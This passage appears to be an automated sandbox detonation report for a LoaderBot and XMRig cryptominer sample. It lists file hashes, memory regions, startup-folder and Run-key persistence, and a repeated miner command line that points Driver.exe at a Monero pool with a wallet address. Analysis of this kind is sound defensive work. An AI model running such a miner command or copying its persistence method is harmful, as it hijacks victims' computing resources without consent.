| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
| SHA1 | 63a5ae4680d40c7c87d3b5b96317a8afbf42d071 |
| SHA256 | 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7 |
| SHA512 | 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a |
memory/4540-135-0x00000195AD3C0000-0x00000195AD96E000-memory.dmp
memory/4540-136-0x00000195ADE60000-0x00000195ADE6A000-memory.dmp
memory/4760-137-0x0000000000000000-mapping.dmp
memory/1492-138-0x0000000000000000-mapping.dmp
memory/4540-140-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/632-139-0x0000000000000000-mapping.dmp
memory/4760-141-0x00000204EDC60000-0x00000204EDC82000-memory.dmp
memory/4760-142-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/632-143-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/1492-144-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/632-148-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/4760-150-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/1492-149-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/1260-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/4540-153-0x00000195AF5C0000-0x00000195AF5D2000-memory.dmp
memory/1260-154-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/2072-155-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-156-0x000000014070A480-mapping.dmp
memory/2072-157-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-158-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-159-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-161-0x000002630A7C0000-0x000002630A7D4000-memory.dmp
memory/4540-160-0x00007FFAB6E30000-0x00007FFAB78F1000-memory.dmp
memory/2072-162-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-163-0x000002630A900000-0x000002630A940000-memory.dmp
memory/2072-164-0x0000000140000000-0x0000000140711000-memory.dmp
memory/2072-165-0x000002639E540000-0x000002639E560000-memory.dmp
memory/2072-166-0x000002639E540000-0x000002639E560000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
151s
Max time network
46s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
